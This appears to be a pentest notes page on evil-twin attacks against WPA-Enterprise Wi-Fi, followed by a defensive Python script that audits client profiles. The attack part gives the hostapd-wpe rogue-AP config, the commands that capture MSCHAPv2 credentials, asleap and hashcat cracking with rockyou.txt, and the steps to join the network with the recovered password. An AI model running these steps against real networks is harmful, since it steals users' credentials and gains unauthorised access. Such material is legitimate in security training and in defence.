# WPA-E (hostapd)

Capture the certificate first using monitor mode, then open the capture in Wireshark and filter for the certificate:

```
tls.handshake.certificate
```

{% hint style="info" %}
Don't forget to kill all processes using Wi-Fi first
{% endhint %}

```
sudo airmon-ng check kill
```

Make sure you know the target SSID; this technique is essentially an Evil-Twin attack against the Wi-Fi access point.

Edit the file `/etc/hostapd-wpe/hostapd-wpe.conf`:

```
# Configuration file for hostapd-wpe

# Interface - Probably wlan0 for 802.11, eth0 for wired
interface=wlan1

# May have to change these depending on build location
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/dh

# 802.11 Options
ssid=hostapd-wpe
channel=1
[snip]
```

Run the Evil Twin:

```
sudo ./hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
```

After the victim enters a username and password:

<figure><img src="https://1855963211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FaDjlLLsWaat1v8p89kgM%2Fuploads%2FYNfvnLHMN4YpyBHIrEgE%2Fimage.png?alt=media&#x26;token=0bb7a3b3-6b19-485b-833a-07ed395f6f98" alt=""><figcaption><p>image from <a href="https://wirelessdefence.co.uk/hostapd-wpe/">https://wirelessdefence.co.uk/hostapd-wpe/</a></p></figcaption></figure>

or check the log:

```bash
cat /var/log/hostapd-wpe.log
```

Then crack the password with rockyou.txt:

```bash
asleap -C <Challenge> -R <Response> -W /usr/share/wordlists/rockyou.txt
```

Alternatively, use hashcat (mode 5500 is NetNTLMv1, the format hostapd-wpe logs on its `hashcat NETNTLM` line):

```
hashcat -m 5500 ./hash_wifi.txt /usr/share/wordlists/rockyou.txt
```

{% hint style="info" %}
You need to use asleap v2.2.
{% endhint %}

ref:

<https://wirelessdefence.co.uk/hostapd-wpe/>

{% embed url="https://warroom.rsmus.com/evil-twin-attack-using-hostapd-wpe/" %}

***

After obtaining the username and password, connect from the terminal:

Create the config file **connect\_wpa-e.conf**:

```
network={
    scan_ssid=1
    eap=PEAP
    ssid="<TARGET-NAME>"
    key_mgmt=WPA-EAP
    identity="<DOMAIN\USERNAME>"
    password="<PASSWORD>"
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}
```

Then connect with wpa_supplicant:

```bash
sudo wpa_supplicant -B -i wlan0 -c ./connect_wpa-e.conf
```

**Obtain an IP Address:**

```
sudo dhclient wlan0
```
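The client block above carries no `ca_cert` and no `domain_match`, so it accepts whatever certificate the RADIUS server presents, which is exactly the gap an evil twin relies on. As an added example (not part of hostapd-wpe, wpa_supplicant or this page's own steps), a small Python auditor that flags those settings in a wpa_supplicant network block; the SSID, identity, CA path and RADIUS hostname in the sample are constructed placeholders:

```python
import re

# Minimal parser for one network={ ... } block: key=value per line, quotes stripped.
def parse_network_block(text):
    m = re.search(r"network=\{(.*?)\}", text, re.S)
    if not m:
        raise ValueError("no network={...} block found")
    params = {}
    for line in m.group(1).splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        params[key.strip()] = value.strip().strip('"')
    return params

# Names that bind the profile to one specific server certificate (all real wpa_supplicant keys).
SERVER_MATCH_KEYS = ("domain_match", "domain_suffix_match", "subject_match", "altsubject_match")

def audit_eap_client(params):
    """Return findings for a WPA-EAP profile; an empty list means the server is pinned."""
    findings = []
    if params.get("key_mgmt") != "WPA-EAP":
        return findings  # PSK or open profile: the evil-twin certificate issue does not apply
    has_ca = "ca_cert" in params
    has_match = any(k in params for k in SERVER_MATCH_KEYS)
    if not has_ca:
        findings.append("no ca_cert: any server certificate is accepted, so a rogue AP completes the TLS tunnel")
    if not has_match:
        findings.append("no domain_match/subject_match: any cert the CA signed passes, not only the real RADIUS server")
    if not (has_ca and has_match) and params.get("phase2", "").upper() == "AUTH=MSCHAPV2":
        findings.append("inner MSCHAPv2 inside an unverified tunnel: challenge/response can be cracked offline")
    return findings

# Constructed sample: the page's client profile (vulnerable) and the same profile pinned to its CA and server.
VULNERABLE = """
network={
    ssid="corp-wifi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="CORP\\alice"
    password="..."
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}
"""
HARDENED = VULNERABLE.replace('phase2="auth=MSCHAPV2"',
    'phase2="auth=MSCHAPV2"\n    ca_cert="/etc/ssl/certs/corp-ca.pem"\n    domain_match="radius.corp.example"')

if __name__ == "__main__":
    for name, cfg in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        print(name, audit_eap_client(parse_network_block(cfg)))
```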
